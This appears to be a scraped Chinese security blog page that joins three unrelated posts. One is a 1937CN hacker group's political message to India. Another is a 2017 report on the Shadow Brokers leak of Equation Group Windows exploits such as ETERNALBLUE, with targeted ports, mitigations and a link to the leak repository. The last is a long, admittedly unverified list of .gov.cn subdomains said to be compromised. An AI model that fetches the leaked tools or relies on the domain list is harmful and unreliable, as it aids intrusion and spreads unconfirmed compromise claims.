中国1937CN黑客组织喊话印度“且行且珍惜”_时事-多维客

近日来自中国的1937CN黑客组织制作了影片,向印度总理莫迪以及印度人民喊话。

视频中黑客自称来自“中国非政府组织1937CN TEAM”,该组织声称:

印度军队越界阻挠中方修路,这是属于入侵行为,中方多次要求印度撤军,没有得到满意答复,现在中印对峙很有可能滑向战争,这是中印两国人民都不想看到的结果,这是印度政治家的错误。 ? ? ?1962年印度侵略中国领土,中国军队自卫反击,打击了印度尼赫鲁政府的霸权主义和扩张政策。如今印度再次入侵中国西藏,中国人民强烈抗议这种危险的战争挑衅。 ? ? ?中国人热爱和平,但也不惧怕战争,面对侵略挑衅,我们有责任,也有能力保卫自己的国家领土,印度同中国一样都是发展中国家,印度政府应该倡导中国提出的一带一路政策,努力发展经济,摆脱贫困。印度的政治家被西方国家操控,实行扩张政策,这是危险的。印度人民应该要有清醒的认识,对错误的政治方向说NO! ? ? ?如果印度决心与中国开战,就是印度灭亡的开始。与中国为敌没有出路,和平共处联合发展才能共赢。不要妄想拉拢其他国家遏制中国。不要在错误的道路上越走越远。

祝愿世界不再有战争,印度:且行且珍惜!”0daybank

方程式又一波大规模 0day 攻击泄漏,微软这次要血崩

来源:[email protected]长亭科技

一大早起床是不是觉得阳光明媚岁月静好?然而网络空间刚刚诞生了一波核弹级爆炸!Shadow Brokers再次泄露出一份震惊世界的机密文档,其中包含了多个精美的 Windows 远程漏洞利用工具,可以覆盖全球 70% 的 Windows 服务器,一夜之间所有Windows服务器几乎全线暴露在危险之中,任何人都可以直接下载并远程攻击利用,考虑到国内不少高校、政府、国企甚至还有一些互联网公司还在使用 Windows 服务器,这次事件影响力堪称网络大地震。

目前已知受影响的 Windows 版本包括但不限于:Windows NT,Windows 2000(没错,古董也支持)、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

故事还要从一年前说起,2016 年 8 月有一个 “Shadow Brokers” 的黑客组织号称入侵了方程式组织窃取了大量机密文件,并将部分文件公开到了互联网上,方程式(Equation Group)据称是 NSA(美国国家安全局)下属的黑客组织,有着极高的技术手段。这部分被公开的文件包括不少隐蔽的地下的黑客工具。另外 “Shadow Brokers” 还保留了部分文件,打算以公开拍卖的形式出售给出价最高的竞价者,“Shadow Brokers” 预期的价格是 100 万比特币(价值接近5亿mei'y)。这一切听起来难以置信,以至于当时有不少安全专家对此事件保持怀疑态度,“Shadow Brokers” 的拍卖也因此一直没有成功。

北京时间 2017 年 4 月 14 日晚,“Shadow Brokers” 终于忍不住了,在推特上放出了他们当时保留的部分文件,解压密码是 “Reeeeeeeeeeeeeee”。

http://p4.qhimg.com/t01e2c916f40ba1518d.png

这次的文件有三个目录,分别为“Windows”、“Swift” 和 “OddJob”,包含一堆令人震撼的黑客工具(我们挑几个重要的列举如下):

EXPLODINGCAN 是 IIS 6.0 远程漏洞利用工具

ETERNALROMANCE 是 SMB1 的重量级利用,可以攻击开放了 445 端口的 Windows XP, 2003, Vista, 7, Windows 8, 2008, 2008 R2 并提升至系统权限。

除此之外 ERRATICGOPHER 、ETERNALBLUE 、ETERNALSYNERGY 、ETERNALCHAMPION 、EDUCATEDSCHOLAR、 EMERALDTHREAD 等都是 SMB 漏洞利用程序,可以攻击开放了 445 端口的 Windows 机器。

ESTEEMAUDIT 是 RDP 服务的远程漏洞利用工具,可以攻击开放了3389 端口的 Windows 机器。

FUZZBUNCH 是一个类似 MetaSploit 的漏洞利用平台。

ODDJOB 是无法被杀毒软件检测的 Rootkit 利用工具。

ECLIPSEDWING 是 Windows 服务器的远程漏洞利用工具。

ESKIMOROLL 是 Kerberos 的漏洞利用攻击,可以攻击 Windows 2000/2003/2008/2008 R2 的域控制器。

不放不要紧,放出来吓坏了一众小伙伴。这些文件包含多个 Windows 神洞的利用工具,只要 Windows 服务器开了135、445、3389 其中的端口之一,有很大概率可以直接被攻击,这相比于当年的 MS08-067 漏洞有过之而无不及啊,如此神洞已经好久没有再江湖上出现过了。

掏出 Exp 试了一波,果然是一打一个准,这些工具的截图如下:

http://p5.qhimg.com/t015439ebcc99615d65.png

http://p0.qhimg.com/t01efd4fde751e310cb.png

http://p6.qhimg.com/t01c05cfc92be5175e5.png

http://p2.qhimg.com/t0127315e4b0e331edc.png

除 Windows 以外,“Shadow Brokers” 泄露的数据还显示方程式攻击了中东一些使用了 Swift 银行结算系统的银行。

http://p5.qhimg.com/t012163b00114d52377.png

缓解措施


所有 Windows 服务器、个人电脑,包括 XP/2003/Win7/Win8,Win 10 最好也不要漏过,全部使用防火墙过滤/关闭 137、139、445端口;对于 3389 远程登录,如果不想关闭的话,至少要关闭智能卡登录功能。

剩下的就是请稳定好情绪,坐等微软出补丁。

参考


Shadow Brokers Release New Files Revealing Windows Exploits, SWIFT Attacks

The Shadow Brokers

https://github.com/misterch0c/shadowbroker/

https://gist.github.com/misterch0c/08829bc65b208609d455a9f4aeaa2a6c0day

数据发布:全国.cn结尾域名被博彩、色情、私服等非法入侵域名数据

违法网站域名列表:主要包含私服、色情、博彩、赌博等网站。此数据收集与互联网,不保证数据的真实有效性,全部采集于搜索引擎。如有误报请联系站长进行删除。

g5gn.fengxin.gov.cn
64bd.fengxin.gov.cn
9qwhb.yqztb.gov.cn
j7stw.yqztb.gov.cn
bqrb9.yqztb.gov.cn
lcgy.jingyuan.gov.cn
www.hhsh.gov.cn
d1u2.fengxin.gov.cn
www.pzhcb.gov.cn
n8b1.fengxin.gov.cn
jnmsjw.gov.cn
t69wc.zzsghj.gov.cn
tcmwl.yqztb.gov.cn
3swxg.yqztb.gov.cn
pbyyx.yqztb.gov.cn
wn1xp.yqztb.gov.cn
ffbb7.yqztb.gov.cn
99z2m.yqztb.gov.cn
z9hhoohl.ahsj.gov.cn
www.hdfmfj.gov.cn
qwcrx.yqztb.gov.cn
lb4pm.yqztb.gov.cn
mpfwd.bdghj.gov.cn
3g2lm.yqztb.gov.cn
6rczb.yqztb.gov.cn
m78lh.yqztb.gov.cn
c9mh7.yqztb.gov.cn
www.jxmdx.gov.cn
c9r1s.yqztb.gov.cn
5nhlk.yqztb.gov.cn
www.wenanga.gov.cn
46hwt.yqztb.gov.cn
l9k6m.yqztb.gov.cn
58yrn.jsgs.gov.cn
ms2cq.jswsw.gov.cn
nm5c9.yqztb.gov.cn
mldnm.yqztb.gov.cn
kd4b9.yqztb.gov.cn
kf3hn.yqztb.gov.cn
b2gx6.yqztb.gov.cn
37xw5.yqztb.gov.cn
ptzc8.yqztb.gov.cn
p474v.mser9.bdghj.gov.cn
qm6rx.yqztb.gov.cn
19d12.yqztb.gov.cn
d6t8x.yqztb.gov.cn
fn1wk.yqztb.gov.cn
zlwpp.yqztb.gov.cn
pk9fx.yqztb.gov.cn
8jj7y.yqztb.gov.cn
71d5n.yqztb.gov.cn
gs1bb.yqztb.gov.cn
8qy6j.yqztb.gov.cn
rje.szscjg.gov.cn
p4pz7.yqztb.gov.cn
jlxcb.yqztb.gov.cn
gk14s.yqztb.gov.cn
jfx9s.yqztb.gov.cn
9gwy9.yqztb.gov.cn
c5c5g.mqxcx.bdghj.gov.cn
qkd17.yqztb.gov.cn
n4aj6.js-n-tax.gov.cn
4tznj.yqztb.gov.cn
1tg.js-n-tax.gov.cn
drtsl.yqztb.gov.cn
33s8j.yqztb.gov.cn
s98718.zzsghj.gov.cn
dxg1m.yqztb.gov.cn
mcw.js-n-tax.gov.cn
pywnt.yqztb.gov.cn
s1n5c.yqztb.gov.cn
bsqldc.zzsghj.gov.cn
0509t9c.zzsghj.gov.cn
bqpbl.yqztb.gov.cn
qv4ng.rruv9.bdghj.gov.cn
swj.gdmx.gov.cn
qq3gf.yqztb.gov.cn
q152p.yqztb.gov.cn
yil2mp.ahhq.gov.cn
www.sdhzrc.gov.cn
maxz5.3pdlg.bdghj.gov.cn
u22hj.szscjg.gov.cn
7lthj.yqztb.gov.cn
vbuoc.bdghj.gov.cn
3bw5l.yqztb.gov.cn
mcz6y.yqztb.gov.cn
dzm1ps.ahhq.gov.cn
x8d5d.yqztb.gov.cn
19bx4.yqztb.gov.cn
w1i5u.szscjg.gov.cn
4zykxd.ahhq.gov.cn
wb1ot.bdghj.gov.cn
hk4cq.yqztb.gov.cn
rrz8w.yqztb.gov.cn
9cysq.yqztb.gov.cn
w5pdb.yqztb.gov.cn
1ye8.ahhq.gov.cn
j16r.js-n-tax.gov.cn
chengjiaoxiang.miluo.gov.cn
y3l8d.yqztb.gov.cn
o7esu.zzsghj.gov.cn
mfr8x.yqztb.gov.cn
p6l9p.yqztb.gov.cn
www.linyi12380.gov.cn
mm11n.yqztb.gov.cn
rovto2.js-n-tax.gov.cn
ds4q2.yqztb.gov.cn
4z23k.yqztb.gov.cn
71mkn.yqztb.gov.cn
dh2zm.yqztb.gov.cn
68t5n.hbsme.gov.cn
ewcn2.bdghj.gov.cn
cjrw7.yqztb.gov.cn
3z3kf.yqztb.gov.cn
socivqi.beixin.gov.cn
xqruoh4.ahhq.gov.cn
singfz.beixin.gov.cn
xolpa.lianshi.gov.cn
9gffc.yqztb.gov.cn
2dk2s.yqztb.gov.cn
w2th.js-n-tax.gov.cn
gbzm7.yqztb.gov.cn
6i5js.kkrdd.bdghj.gov.cn
wnck.fengxin.gov.cn
ceping.taoyuan.gov.cn
1h297.yqztb.gov.cn
2srtp.yqztb.gov.cn
xxb.sei.gov.cn
jxp9y.yqztb.gov.cn
9rrs9.yqztb.gov.cn
www.gdrst.gov.cn
tq23n.yqztb.gov.cn
www.js-n-tax.gov.cn
www.nzjt.gov.cn
nyj.xinmi.gov.cn
hcd5g.yqztb.gov.cn
hwh97.yqztb.gov.cn
www.gdet.gov.cn
t9bbn.zzsghj.gov.cn
b4dl8.yqztb.gov.cn
rcztb.yqztb.gov.cn
q6n2q.yqztb.gov.cn
mmmwk.yqztb.gov.cn
xrcbs.bdghj.gov.cn
www.qsx.gov.cn
www.xcrkw.gov.cn
www.jgdq.gov.cn
xcgmrrc4.ahsj.gov.cn
3g9gb.yqztb.gov.cn
9krgm.yqztb.gov.cn
s14pd.yqztb.gov.cn
wcwjj.gov.cn
g2hht.yqztb.gov.cn
r5wcf.yqztb.gov.cn
www.hbnz.gov.cn
4t6zy.yqztb.gov.cn
ddkbg.yqztb.gov.cn
gc8vl.papwe.bdghj.gov.cn
rpphr.yqztb.gov.cn
zd5r5.yqztb.gov.cn
il3fcs9n.ahsj.gov.cn
slns4.yqztb.gov.cn
tsw14.yqztb.gov.cn
93872.yqztb.gov.cn
k2nxw.yqztb.gov.cn
fogh.fengxin.gov.cn
mlkl2.yqztb.gov.cn
www.aylzw.gov.cn
vvqp.fengxin.gov.cn
cytour.gov.cn
27ft.fengxin.gov.cn
nay8.fengxin.gov.cn
9glyx6ct.ahsj.gov.cn
zf4bp.yqztb.gov.cn
cstgi.js-n-tax.gov.cn
l8y2.fengxin.gov.cn
d5iw.fengxin.gov.cn
te4a.fengxin.gov.cn
xuxa0uun.ahsj.gov.cn
6sfqc.yqztb.gov.cn
3vm9.fengxin.gov.cn
rwxs.fengxin.gov.cn
kc3q.fengxin.gov.cn
5ydt.fengxin.gov.cn
bvhc.fengxin.gov.cn
19he.fengxin.gov.cn
bl57.fengxin.gov.cn
9cx7m.yqztb.gov.cn
rqh3d.yqztb.gov.cn
fukd.fengxin.gov.cn
vk6t.fengxin.gov.cn
lwl4.fengxin.gov.cn
gfek.fengxin.gov.cn
cxg2.fengxin.gov.cn
jtc5.fengxin.gov.cn
nm57.fengxin.gov.cn
3obl.fengxin.gov.cn
tvkn.fengxin.gov.cn
n8y5.fengxin.gov.cn
e8bb.fengxin.gov.cn
bosx.fengxin.gov.cn
wdfi.fengxin.gov.cn
xofd.fengxin.gov.cn
ljy2.fengxin.gov.cn
qw4w.fengxin.gov.cn
www.hhzb.gov.cn
h5shr.yqztb.gov.cn
76744.zjmb.gov.cn
5q1z9.szscjg.gov.cn
69s55.yqztb.gov.cn
46z9m.yqztb.gov.cn
92n4n.yqztb.gov.cn
31ksp.yqztb.gov.cn
36y9n.yqztb.gov.cn
hxw94.yqztb.gov.cn
www.wyny.gov.cn
2xd4x.yqztb.gov.cn
ppakd.bdghj.gov.cn
tmn24.beihu.gov.cn
b62yc.yqztb.gov.cn
4b7f5.yqztb.gov.cn
krxw6.yqztb.gov.cn
h8r1t.yqztb.gov.cn
p1d1j.yqztb.gov.cn
jrdzg.yqztb.gov.cn
9zxwz.yqztb.gov.cn
www.snjj.gov.cn
49hlp.yqztb.gov.cn
fzjgc.yqztb.gov.cn
www.genhe.gov.cn
ghtes.bdghj.gov.cn
2flfb.yqztb.gov.cn
s7wlt.yqztb.gov.cn
www.gov.cn
cuzfsnvs.ahsj.gov.cn
fz1pu.bdghj.gov.cn
pmhnp.yqztb.gov.cn
www.tzxj.gov.cn
yd5xh.yqztb.gov.cn
sxmqb.yqztb.gov.cn
js9hg.yqztb.gov.cn
g5h39.yqztb.gov.cn
yfldz.yqztb.gov.cn
mtjnz.yqztb.gov.cn
sacn8.lianshi.gov.cn
www.xiangyin.gov.cn
wlwz.dongping.gov.cn
tk78q.yqztb.gov.cn
www.ewenke.gov.cn
kln1s.yqztb.gov.cn
cl9r3.yqztb.gov.cn
www.lsj.gov.cn
6ftrs.yqztb.gov.cn
7dmbd.yqztb.gov.cn
51syu.lianshi.gov.cn
vtc.szscjg.gov.cn
isv6ua.songxi.gov.cn
www.wjw.bjshy.gov.cn
gyxhgt.gov.cn
gc4x4.yqztb.gov.cn
8xd71.yqztb.gov.cn
www.cnfx.gov.cn
mfoci.szscjg.gov.cn
9jhn589.js-n-tax.gov.cn
7680511x.ctjbkm.86r.czsczj.gov.cn
footytn.beixin.gov.cn
gcwz.ahhq.gov.cn
53317q6c.rhx37w.1vw.czsczj.gov.cn
www.linqujiuye.gov.cn
i05.js-n-tax.gov.cn
4tx8k.hbsme.gov.cn
1nq.well.jswst.gov.cn
rw.new.jswst.gov.cn
www.libo.gov.cn
t1oou.hflyzzb.gov.cn
wzgn0jc.zzsghj.gov.cn
89892wj6.2ty0sn.90b.czsczj.gov.cn
70748hf7.6z2uez.b11.czsczj.gov.cn
fda.gslz.gov.cn
www.bjmz.gov.cn
www.gdwj.gov.cn
87200pe8.xvp.czsczj.gov.cn
nhumg.jxipo.gov.cn
1096062o.hs9.czsczj.gov.cn
mhhm.gchlslj.gov.cn
m.xtrd.gov.cn
94793p29.k4sk8p.i0j.czsczj.gov.cn
www.lyszj.gov.cn
sxyctyj.gov.cn
vj802d.kcg.czsczj.gov.cn
www.whga.gov.cn
www.zlb.gov.cn
80499xah.46j.czsczj.gov.cn
www.ahga.gov.cn
m.moe.gov.cn
47974o15.tv5.czsczj.gov.cn
www.gslz.gov.cn
www.gzlr.gov.cn
eiick.jxipo.gov.cn
www.smxs.gov.cn
www.ayxwsj.gov.cn
gp.hd.gov.cn
www.cqybzx.gov.cn
49952pnw.88cj9z.n78.czsczj.gov.cn
ncct.fengxin.gov.cn
5v4d.fengxin.gov.cn
lpim.fengxin.gov.cn
a8z6.fengxin.gov.cn
jxjx.fengxin.gov.cn
4ffr.fengxin.gov.cn
yg1v.fengxin.gov.cn
8fwx.fengxin.gov.cn
22fk.fengxin.gov.cn
2ptm.fengxin.gov.cn
uvyk.fengxin.gov.cn
7kd5.fengxin.gov.cn
qtfs.fengxin.gov.cn
b4fg.fengxin.gov.cn
s2mg.fengxin.gov.cn
a3p4.fengxin.gov.cn
aycb.fengxin.gov.cn
c7zv.fengxin.gov.cn
pf4k.fengxin.gov.cn
fo3o.fengxin.gov.cn
bhdt.fengxin.gov.cn
2tdq.fengxin.gov.cn
2uxo.fengxin.gov.cn
ielh.fengxin.gov.cn
6qap.fengxin.gov.cn
1p51.fengxin.gov.cn
ghg3.fengxin.gov.cn
20oe.fengxin.gov.cn
rywe.fengxin.gov.cn
eogm.fengxin.gov.cn
s2a0.fengxin.gov.cn
h48u.fengxin.gov.cn
nohs.fengxin.gov.cn
5pfa.fengxin.gov.cn
12y1.fengxin.gov.cn
hevk.fengxin.gov.cn
yn9m.fengxin.gov.cn
9izb.fengxin.gov.cn
e4k1.fengxin.gov.cn
rgnz.fengxin.gov.cn
vluh.fengxin.gov.cn
7qbs.fengxin.gov.cn
cj5u.fengxin.gov.cn
i16b.fengxin.gov.cn
rpc6.fengxin.gov.cn
045b.fengxin.gov.cn
nc3z.fengxin.gov.cn
oxvt.fengxin.gov.cn
y0rd.fengxin.gov.cn
trpt.fengxin.gov.cn
m51x.fengxin.gov.cn
rt17.fengxin.gov.cn
jxhd.fengxin.gov.cn
qurt.fengxin.gov.cn
ldzh.fengxin.gov.cn
f25d.fengxin.gov.cn
456y.fengxin.gov.cn
bssh.fengxin.gov.cn
onji.fengxin.gov.cn
xhp1.fengxin.gov.cn
379q.fengxin.gov.cn
x59v.fengxin.gov.cn
v6d6.fengxin.gov.cn
uop1.fengxin.gov.cn
dby2.fengxin.gov.cn
a6wz.fengxin.gov.cn
4wcs.fengxin.gov.cn
uqr5.fengxin.gov.cn
aby6.fengxin.gov.cn
2kdy.fengxin.gov.cn
zt41.fengxin.gov.cn
h5yi.fengxin.gov.cn
ir6z.fengxin.gov.cn
5t6c.fengxin.gov.cn
zqfm.fengxin.gov.cn
6amm.fengxin.gov.cn
dcbb.fengxin.gov.cn
6sm7.fengxin.gov.cn
3lzr.fengxin.gov.cn
5bgb.fengxin.gov.cn
f0c9.fengxin.gov.cn
7hg4.fengxin.gov.cn
r41p.fengxin.gov.cn
ksne.fengxin.gov.cn
2jk8.fengxin.gov.cn
2u2e.fengxin.gov.cn
jgx5.fengxin.gov.cn
8axc.fengxin.gov.cn
k5k3.fengxin.gov.cn
hd2b.fengxin.gov.cn
lsh3.fengxin.gov.cn
jlhd.fengxin.gov.cn
bv82.fengxin.gov.cn
91hk.fengxin.gov.cn
citl.fengxin.gov.cn
7fkz.fengxin.gov.cn
jqlo.fengxin.gov.cn
nnew.fengxin.gov.cn
q0oy.fengxin.gov.cn
71zw.fengxin.gov.cn
rriu.fengxin.gov.cn
5fjr.fengxin.gov.cn
5u3b.fengxin.gov.cn
pqyw.fengxin.gov.cn
ncri.fengxin.gov.cn
5zj3.fengxin.gov.cn
4bv2.fengxin.gov.cn
3zvg.fengxin.gov.cn
vdq6.fengxin.gov.cn
o3eh.fengxin.gov.cn
9mss.fengxin.gov.cn
qk1a.fengxin.gov.cn
z25p.fengxin.gov.cn
0uwk.fengxin.gov.cn
bqeu.fengxin.gov.cn
lxjr.fengxin.gov.cn
blxa.fengxin.gov.cn
a158q.fengxin.gov.cn
qon8.fengxin.gov.cn
l6i7.fengxin.gov.cn
69s4.fengxin.gov.cn
z1qt.fengxin.gov.cn
v8cy.fengxin.gov.cn
f41h.fengxin.gov.cn
7gnp.fengxin.gov.cn
o0o4.fengxin.gov.cn
jc87.fengxin.gov.cn
ykxn.fengxin.gov.cn
hscp.fengxin.gov.cn
asdi.fengxin.gov.cn
67al.fengxin.gov.cn
giph.fengxin.gov.cn
k0ti.fengxin.gov.cn
aiiz.fengxin.gov.cn
e9e2.fengxin.gov.cn
5rcp.fengxin.gov.cn
zhra.fengxin.gov.cn
qi8r.fengxin.gov.cn
78uy.fengxin.gov.cn
bqzi.fengxin.gov.cn
51g7.fengxin.gov.cn
l5wv.fengxin.gov.cn
iume.fengxin.gov.cn
7vac.fengxin.gov.cn
5zmh.fengxin.gov.cn
9rrs.fengxin.gov.cn
4309.fengxin.gov.cn
zh9f.fengxin.gov.cn
w36w.fengxin.gov.cn
242w.fengxin.gov.cn
amm4.fengxin.gov.cn
ji0q.fengxin.gov.cn
5vli.fengxin.gov.cn
5rru.fengxin.gov.cn
hr6f.fengxin.gov.cn
0wa6.fengxin.gov.cn
jptk.fengxin.gov.cn
k7kb.fengxin.gov.cn
9e2d.fengxin.gov.cn
ju30.fengxin.gov.cn
q24i.fengxin.gov.cn
xk4b.fengxin.gov.cn
sayq.fengxin.gov.cn
idlc.fengxin.gov.cn
u7x5.fengxin.gov.cn
32h1.fengxin.gov.cn
vi9i.fengxin.gov.cn
fzaj.fengxin.gov.cn
wjpf.fengxin.gov.cn
aj92t9.zzsghj.gov.cn
x6bh.fengxin.gov.cn
yurf.fengxin.gov.cn
qumz.fengxin.gov.cn
8wh7.fengxin.gov.cn
4t5f.fengxin.gov.cn
mg9ollvm.ahsj.gov.cn
aqza.fengxin.gov.cn
er5d.fengxin.gov.cn
t52f.fengxin.gov.cn
c3ix.fengxin.gov.cn
x947.fengxin.gov.cn
2k5z.fengxin.gov.cn
8t01.fengxin.gov.cn
2ev9.fengxin.gov.cn
l7kf.fengxin.gov.cn
bcwk.fengxin.gov.cn
b4of.fengxin.gov.cn
uvue.fengxin.gov.cn
3sgp.fengxin.gov.cn
m1dq.fengxin.gov.cn
6f6i.fengxin.gov.cn
cnv6.fengxin.gov.cn
dvgipg.js-n-tax.gov.cn
ph2m.fengxin.gov.cn
ycjb.fengxin.gov.cn
lhw5.fengxin.gov.cn
kajt.fengxin.gov.cn
98.1nf9s.zzsghj.gov.cn
kfuv.fengxin.gov.cn
dqof.fengxin.gov.cn
prr1.fengxin.gov.cn
gz4a.fengxin.gov.cn
yhj2.fengxin.gov.cn
pgs6.fengxin.gov.cn
4irz.js-n-tax.gov.cn
3ocj.fengxin.gov.cn
gf2h.fengxin.gov.cn
c5iy.fengxin.gov.cn
e23q.fengxin.gov.cn
cymh.fengxin.gov.cn
6u3bytil.ahsj.gov.cn
ns4q.fengxin.gov.cn
www.dszqgsvs.com
vg8c8.zzsghj.gov.cn
vay4.fengxin.gov.cn
87lc.fengxin.gov.cn
y8kj.fengxin.gov.cn
jkmt.fengxin.gov.cn
blle.fengxin.gov.cn
dowm.fengxin.gov.cn
c3cq.fengxin.gov.cn
w637.fengxin.gov.cn
uskh.fengxin.gov.cn
fcq2.fengxin.gov.cn
ecwl.fengxin.gov.cn
pmtl5jxn.ahsj.gov.cn
8l91.fengxin.gov.cn
4ome.fengxin.gov.cn
4bs1.fengxin.gov.cn
xig8.fengxin.gov.cn
xxl2.fengxin.gov.cn
ijo5.fengxin.gov.cn
wrb4o.js-n-tax.gov.cn
m3t6.fengxin.gov.cn
dsaj.fengxin.gov.cn
vc38.fengxin.gov.cn
qxhqkhxg.ahsj.gov.cn
8hu0.fengxin.gov.cn
an2k.fengxin.gov.cn
tz6z.fengxin.gov.cn
iri0.fengxin.gov.cn
0m3s.fengxin.gov.cn
3ads.fengxin.gov.cn
styk.fengxin.gov.cn
1fc4ll.tzsczj.gov.cn
nuqmmxnm.ahsj.gov.cn
9pkv.fengxin.gov.cn
glyh.fengxin.gov.cn
z753.fengxin.gov.cn
laus.fengxin.gov.cn
wwyvpzqa.ahsj.gov.cn
5brh.fengxin.gov.cn
xicrif26.ahsj.gov.cn
3ah2.fengxin.gov.cn
5ptd.fengxin.gov.cn
q98q.fengxin.gov.cn
by8p.fengxin.gov.cn
tvkd.fengxin.gov.cn
hf5k.fengxin.gov.cn
n6o3.fengxin.gov.cn
jkld.fengxin.gov.cn
a10f.fengxin.gov.cn
w2o9.fengxin.gov.cn
21ad.fengxin.gov.cn
uai6.fengxin.gov.cn
vw2x45n.zzsghj.gov.cn
159q.fengxin.gov.cn
6rhn.fengxin.gov.cn
mth5.fengxin.gov.cn
2ob0.fengxin.gov.cn
cfynmnph.ahsj.gov.cn
bsvx.fengxin.gov.cn
858w.fengxin.gov.cn
h7az.fengxin.gov.cn
3vov.fengxin.gov.cn
1nj4.fengxin.gov.cn
qk8p.fengxin.gov.cn
wnfr.fengxin.gov.cn
5kpp7t6.js-n-tax.gov.cn
4cek.fengxin.gov.cn
xrmqaeyk.ahsj.gov.cn
dlbm.fengxin.gov.cn
x7b8.fengxin.gov.cn
ck4z.fengxin.gov.cn
nr5s.fengxin.gov.cn
no20.fengxin.gov.cn
0685.fengxin.gov.cn
8hw8.fengxin.gov.cn
fqdf.fengxin.gov.cn
8nrj.fengxin.gov.cn
gj8bn7.zzsghj.gov.cn
mds1.fengxin.gov.cn
qjis.fengxin.gov.cn
8s3n.fengxin.gov.cn
p3nhvdxw.ahsj.gov.cn
suhb.fengxin.gov.cn
lcps.fengxin.gov.cn
lbmm.fengxin.gov.cn
tsts.fengxin.gov.cn
kqyovj3w.ahsj.gov.cn
prdb.fengxin.gov.cn
3z60.fengxin.gov.cn
dl9c.fengxin.gov.cn
egjtnjue.ahsj.gov.cn
476p.fengxin.gov.cn
qx9r.fengxin.gov.cn
cuds.fengxin.gov.cn
548n6.yqztb.gov.cn
g36b7.yqztb.gov.cn
snj6f.yqztb.gov.cn
ml5wb.yqztb.gov.cn
bwekg.bdghj.gov.cn
754mf.yqztb.gov.cn
60776wuw.tgqk4x.7zb.czsczj.gov.cn
hdsxh.yqztb.gov.cn
75yyf.yqztb.gov.cn
w3k.js-n-tax.gov.cn
jc8xw.yqztb.gov.cn
mtyx3.yqztb.gov.cn
k98b4.yqztb.gov.cn
fkl.szscjg.gov.cn
l6pd5.yqztb.gov.cn
ps6j6.yqztb.gov.cn
rdmp3.bdghj.gov.cn
www.jxgaj.gov.cn
reelp8ys8.yqztb.gov.cn
cymld.yqztb.gov.cn
www.czgabmfw.gov.cn
lsg33.yqztb.gov.cn
kxodc.bdghj.gov.cn
c5ch2.jsgs.gov.cn
jjah7g.0gn.czsczj.gov.cn
qwcx4.yqztb.gov.cn
gazqo.jxipo.gov.cn
935011fk.7buwre.tcs.czsczj.gov.cn
yzlbv.jxipo.gov.cn
65963esc.k4sk8p.i0j.czsczj.gov.cn
xpdre.js-n-tax.gov.cn
gjuxz.jxipo.gov.cn
393dk.yqztb.gov.cn
3sgsd.yqztb.gov.cn
6rr9h.yqztb.gov.cn
rkw.xinmi.gov.cn
h8359.yqztb.gov.cn
www.hongshan.gov.cn
663km.beihu.gov.cn
wtbyb.qxdj.gov.cn
291491xa.2ty0sn.90b.czsczj.gov.cn
g1617.yqztb.gov.cn
c6cmw.beihu.gov.cn
lixianxx.lixian.gov.cn
98sx3.yqztb.gov.cn
wap.hami.gov.cn
n3ltf.yqztb.gov.cn
www.gzjj.gov.cn
www.scbb.gov.cn
kgl6s.yqztb.gov.cn
www.jw.fy.gov.cn
afek6t6p.ahsj.gov.cn
cflh9f1u.ahsj.gov.cn
jjdhmlqm.ahsj.gov.cn
087x.fengxin.gov.cn
kdwk.fengxin.gov.cn
xbp5.fengxin.gov.cn
s1w9.fengxin.gov.cn
vtfb.fengxin.gov.cn
socs.fengxin.gov.cn
79u3.fengxin.gov.cn
nv0i.fengxin.gov.cn
lcma2bry.ahsj.gov.cn
xqnw.fengxin.gov.cn
72yw.fengxin.gov.cn
19v2.fengxin.gov.cn
nzzn.fengxin.gov.cn
y62y.fengxin.gov.cn
u3w9.fengxin.gov.cn
w1pj.fengxin.gov.cn
t9eu.fengxin.gov.cn
cnfu.fengxin.gov.cn
0ukz.fengxin.gov.cn
zyni.fengxin.gov.cn
dkkq.fengxin.gov.cn
qqiz.fengxin.gov.cn
fqz8.fengxin.gov.cn
r8otvouy.ahsj.gov.cn
azv5.fengxin.gov.cn
lk5z.fengxin.gov.cn
g19y.fengxin.gov.cn
vxxw.fengxin.gov.cn
fwu1.fengxin.gov.cn
hzgj.fengxin.gov.cn
ywq5.fengxin.gov.cn
adx3.fengxin.gov.cn
bftgl.js-n-tax.gov.cn
29gh.fengxin.gov.cn
i1k3.fengxin.gov.cn
vr7k.fengxin.gov.cn
w5wn.fengxin.gov.cn
3m57.fengxin.gov.cn
dxpy.fengxin.gov.cn
xotv.fengxin.gov.cn
labg.fengxin.gov.cn
l46u.fengxin.gov.cn
r3jw.fengxin.gov.cn
ua9y.fengxin.gov.cn
bg5i.fengxin.gov.cn
9jbp.fengxin.gov.cn
6jwo.fengxin.gov.cn
kxkb.fengxin.gov.cn
fwgi.fengxin.gov.cn
8ftn.fengxin.gov.cn
huu5.fengxin.gov.cn
xzrs.fengxin.gov.cn
kie4.fengxin.gov.cn
q3oi.fengxin.gov.cn
www.ihjqz.bdghj.gov.cn
he0i.fengxin.gov.cn
2t52p.yqztb.gov.cn
w3632.yqztb.gov.cn
cdf1o.lianshi.gov.cn
25jj.fengxin.gov.cn
www.htkfq.gov.cn
www.qwrsrc.gov.cn
3ev7w.lianshi.gov.cn
www.ahhq.gov.cn
wbxnh.bdghj.gov.cn
h94bk.jsgs.gov.cn
bookzl.beixin.gov.cn
mobixt.beixin.gov.cn
kodtvd.bdghj.gov.cn
av2oz.lianshi.gov.cn
yatzg.lianshi.gov.cn
0ldop.lianshi.gov.cn
eg4dd.lianshi.gov.cn
1ycn6.yqztb.gov.cn
jfieqj.bdghj.gov.cn
tclcr.lianshi.gov.cn
gnejk.lianshi.gov.cn
dusvi.lianshi.gov.cn
8mjyc.yqztb.gov.cn
hknaw.bdghj.gov.cn
kpfb2.lianshi.gov.cn
ehyed.lianshi.gov.cn
yzcif.bdghj.gov.cn
x19z8.yqztb.gov.cn
2645z.yqztb.gov.cn
h2cng.yqztb.gov.cn
3dp9y.yqztb.gov.cn
jmamm.bdghj.gov.cn
vqqa2.lianshi.gov.cn
l7gwy.lianshi.gov.cn
centbgo.beixin.gov.cn
amhxb.bdghj.gov.cn
prkoq.e645s.songxi.gov.cn
ufp5z.lianshi.gov.cn
fbqwm.yqztb.gov.cn
dpiyq.lianshi.gov.cn
6stkh.yqztb.gov.cn
driviyr.beixin.gov.cn
3ychm.vddpk.bdghj.gov.cn
funazw.zzjsxxw.gov.cn
205sm.lianshi.gov.cn
ggafxx.bdghj.gov.cn
archfxa.beixin.gov.cn
focuwjn.beixin.gov.cn
lighmq.beixin.gov.cn
studse.beixin.gov.cn
disc90.beixin.gov.cn
